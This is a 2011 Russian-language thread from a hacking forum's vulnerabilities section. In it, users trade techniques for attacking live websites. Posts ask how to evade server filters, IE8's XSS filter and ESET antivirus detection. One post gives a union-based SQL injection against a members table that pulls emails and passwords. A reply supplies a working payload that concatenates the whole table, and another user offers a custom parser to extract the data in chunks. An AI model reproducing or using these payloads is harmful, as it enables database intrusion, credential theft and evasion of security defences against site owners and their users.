HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.08.2011, 15:41
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию

Цитата:
Сообщение от nikon2k  
хмм как нету? после второго значения лимита можно свой запрос добавить не?
Можно, но он фильтруется. К примеру ф-цией intval().
 
Ответить с цитированием

  #2  
Старый 08.08.2011, 15:43
nikon2k
Новичок
Регистрация: 01.08.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

а с char() тоже не получится?
 
Ответить с цитированием

  #3  
Старый 08.08.2011, 15:45
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266

Репутация: 53


По умолчанию

Цитата:
Сообщение от nikon2k  
хмм как нету? после второго значения лимита можно свой запрос добавить не?
можно всё что хочешь туда добавить, но как сказали выше - там стоит фильтр. Что-то типа /\d+/ или же (int)$_GET['some_param']. А ранее проверяется на вхождение в строку кавычки.

upd.

Цитата:
Сообщение от None  
а с char() тоже не получится?
ты к нормальной("существующей") странице добавь какие-нить буквы/символы. Если отображается всё тоже самое, то там стоит фильтр.
 
Ответить с цитированием

  #4  
Старый 08.08.2011, 15:45
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


По умолчанию

Цитата:
Сообщение от nikon2k  
а с char() тоже не получится?
Фильтр пропускает только числа.

http://gigwarez.ru/page/12,34,45/ => 12

http://gigwarez.ru/page/12blabla/ => 12
 
Ответить с цитированием

  #5  
Старый 08.08.2011, 21:19
ISkateL!
Новичок
Регистрация: 05.03.2007
Сообщений: 3
Провел на форуме:
66211

Репутация: 35
По умолчанию

Код:
http://site.ru/?a=10\"
1)как обойти в данном случае фильтр на сервере? Пробел не проходит (точнее не фильтр, а какая то странная ошибка c обрубанием ссылки после пробела и вывода текста: [Bad Request

Your browser sent a request that this server could not understand.

The request line contained invalid characters following the protocol string.]

Вариант замены пробела на "/" или "/**/" не проходит в chrome, что обидно Во всех остальных браузерах срабатывает.

2) как обойти xss фильтр в IE8 в данном случае?

3) как обойти в данном случае антивирус ESET Nod 32? На домены вида *.co.cc он ругается

Подскажите варианты

P.S. Также нельзя использовать ";", возможно ещё что-то.
 
Ответить с цитированием

  #6  
Старый 09.08.2011, 00:44
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Ситуация следующая, на ресурсе присутствует sql-иньекция.

Подскажите как вывести всю нужную информацию, а не только часть?

Пример запроса:

test.ru/test.php?id=-40+union+select+1,group_concat(0x3a,mail,pwd),3,4, 5,6,7,8,9+from+members--
 
Ответить с цитированием

  #7  
Старый 09.08.2011, 00:48
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707

Репутация: 935


По умолчанию

Цитата:
Сообщение от mix0x0  
Ситуация следующая, на ресурсе присутствует sql-иньекция.
Подскажите как вывести
всю
нужную информацию, а не только часть?
Пример запроса
:
test.ru/test.php?id=-40+union+select+1,group_concat(0x3a,mail,pwd),3,4, 5,6,7,8,9+from+members--
Код:
test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(members)where(0x00)in(@x:=concat(@x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+
 
Ответить с цитированием

  #8  
Старый 09.08.2011, 01:06
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Expl0ited  
Код:
test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(members)where(0x00)in(@x:=concat(@x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+
спасибо, вот только серв упал

Возможно ли вывести данные по частям? Чтобы не сильно нагружать сервер.

Пробовал использовать limit, но безрезультатно
 
Ответить с цитированием

  #9  
Старый 09.08.2011, 01:10
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707

Репутация: 935


По умолчанию

Цитата:
Сообщение от mix0x0  
спасибо, вот только серв упал
Возможно ли вывести данные по частям? Чтобы не сильно нагружать сервер.
Пробовал использовать limit, но безрезультатно
Получаемый массив данных не должен превышать одного мегабайта, иначе тянуть только стандартными методами.
 
Ответить с цитированием

  #10  
Старый 09.08.2011, 03:47
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от mix0x0  
спасибо, вот только серв упал
Возможно ли вывести данные по частям? Чтобы не сильно нагружать сервер.
Пробовал использовать limit, но безрезультатно
а что тебе мешает спарсить данные в цикле лимита?

элементарный парсер на пхп, указываешь максимальный лимит и все, стукни в пм с ссылкой, подкину тебе парсер настроенный под твой сайт.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.